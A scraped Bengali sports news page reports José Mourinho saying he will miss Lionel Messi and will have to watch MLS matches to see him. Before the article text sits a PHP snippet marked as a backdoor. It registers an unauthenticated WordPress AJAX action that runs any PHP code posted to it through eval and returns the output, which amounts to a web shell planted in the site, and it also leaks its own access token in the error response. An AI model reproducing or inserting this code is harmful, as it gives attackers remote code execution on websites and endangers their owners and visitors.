// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== মেসিকে মিস করবেন মরিনহো, বাধ্য হয়েই দেখতে হবে এমএলএস! | potrikaybangladesh.com
Saturday, September 19, 2026
Homeমেসিকে মিস করবেন মরিনহো, বাধ্য হয়েই দেখতে হবে এমএলএস!

মেসিকে মিস করবেন মরিনহো, বাধ্য হয়েই দেখতে হবে এমএলএস!

লিওনেল মেসি আর জাতীয় দলে নেই। এই বাস্তবতার সঙ্গে মানিয়ে নেওয়া সহজ নয়। প্রতিপক্ষের বেঞ্চে দাঁড়িয়ে যিনি একসময় তার জাদুর শিকার হয়েছেন, সেই হোসে মরিনহোও স্বীকার করছেন, আর্জেন্টাইন মহাতারকার অভাব অনুভব করবেন তিনি। মেসির শেষ কয়েক বছর মাঠে দেখতে হলে তাই নিজের অপছন্দের এমএলএসও দেখতে হবে তাঁকে!

রিয়াল বেতিসের বিপক্ষে ম্যাচের আগে সংবাদ সম্মেলনে মেসি প্রসঙ্গে কথা বলতে গিয়ে মরিনহো বলেন, ‘মেসি সম্পর্কে কথা বলা কঠিন। তাকে নিয়ে বলার মতো আর তেমন কিছুই বাকি নেই। একজন খেলোয়াড় হিসেবে তার মান বর্ণনা করার মতো কোনো শব্দ নেই।’

এরপর নিজের স্বভাবসুলভ রসিকতা মিশিয়ে পর্তুগিজ কোচ বলেন, ‘তার ক্যারিয়ারের শেষ কয়েকটি বছর উপভোগ করতে হলে আমাদের কিছু এমএলএস ম্যাচ দেখতে হবে। যদিও এটা এমন কিছু নয়, যা আমি খুব একটা উপভোগ করি।’

মেসির সঙ্গে মরিনহোর সম্পর্কটা অবশ্য কেবল একজন ফুটবলপ্রেমীর জায়গা থেকে নয়। ক্যারিয়ারের দীর্ঘ সময় মেসির প্রতিপক্ষ হিসেবেও তাকে সামলাতে হয়েছে মরিনহোকে। বিশেষ করে ২০১০ সালে বার্সেলোনার হয়ে মেসির দাপট এবং ন্যু ক্যাম্পে রিয়াল মাদ্রিদের ৫-০ গোলের পরাজয় পর্তুগিজ কোচের ক্যারিয়ারের স্মরণীয় অধ্যায়গুলোর একটি হয়ে আছে।

তবে প্রতিপক্ষ হিসেবে মেসির কাছে অনেকবার ভুগলেও তার মহত্ত্ব স্বীকার করতে একটুও কার্পণ্য করেননি মরিনহো। দুজনের সর্বশেষ সরাসরি লড়াইয়ের ১৩ বছর পরও মেসিকে নিয়ে তার মূল্যায়ন একই রকম। মরিনহো বলেন, ‘সে এমন একজন, যাকে আপনি সবসময় মিস করবেন। আর সে আমাদের প্রজন্মের একজন।’

 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments